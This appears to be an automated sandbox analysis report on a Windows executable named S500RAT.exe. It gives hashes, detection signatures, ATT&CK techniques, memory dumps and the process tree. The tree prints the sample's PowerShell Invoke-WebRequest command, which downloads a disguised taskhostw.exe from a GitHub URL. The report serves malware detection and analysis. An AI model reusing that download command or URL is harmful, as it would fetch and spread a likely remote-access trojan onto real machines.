3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
15-07-2024 01:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

S500RAT.exe
Size

18.0MB
MD5

5b52658c4517684971de10a6b7a67c30
SHA1

f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256

3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512

ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6
SSDEEP

393216:o/dQeve921Fkv09cHJZwGn5GkPVtGhyyepDoSYYD4WchJ2sphHJG8:o1/LFkvPHJZwGn5dChyRpchNBJG8

Score

8^/10

execution upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2724	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2176-0-0x0000000000400000-0x0000000000439000-memory.dmp	upx
behavioral1/memory/2176-17-0x0000000000400000-0x0000000000439000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2724	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2724	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2176 wrote to memory of 2728	2176	S500RAT.exe	30
PID 2176 wrote to memory of 2728	2176	S500RAT.exe	30
PID 2176 wrote to memory of 2728	2176	S500RAT.exe	30
PID 2176 wrote to memory of 2728	2176	S500RAT.exe	30
PID 2728 wrote to memory of 2804	2728	cmd.exe	32
PID 2728 wrote to memory of 2804	2728	cmd.exe	32
PID 2728 wrote to memory of 2804	2728	cmd.exe	32
PID 2728 wrote to memory of 2724	2728	cmd.exe	33
PID 2728 wrote to memory of 2724	2728	cmd.exe	33
PID 2728 wrote to memory of 2724	2728	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2176
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5264.tmp\5265.tmp\5266.bat C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5264.tmp\5265.tmp\5266.bat

Filesize
1KB

MD5
fc4af7384f0b6f274dd3e745f0aceeaa

SHA1
31b310f869b15b84e52ef282cabaee974e5043cf

SHA256
f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34

SHA512
dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

Download Submit
memory/2176-0-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2176-17-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2724-7-0x000007FEF55FE000-0x000007FEF55FF000-memory.dmp

Filesize
4KB

Download
memory/2724-9-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2724-8-0x000000001B6A0000-0x000000001B982000-memory.dmp

Filesize
2.9MB

Download
memory/2724-10-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2724-11-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2724-12-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2724-14-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2724-13-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2724-15-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download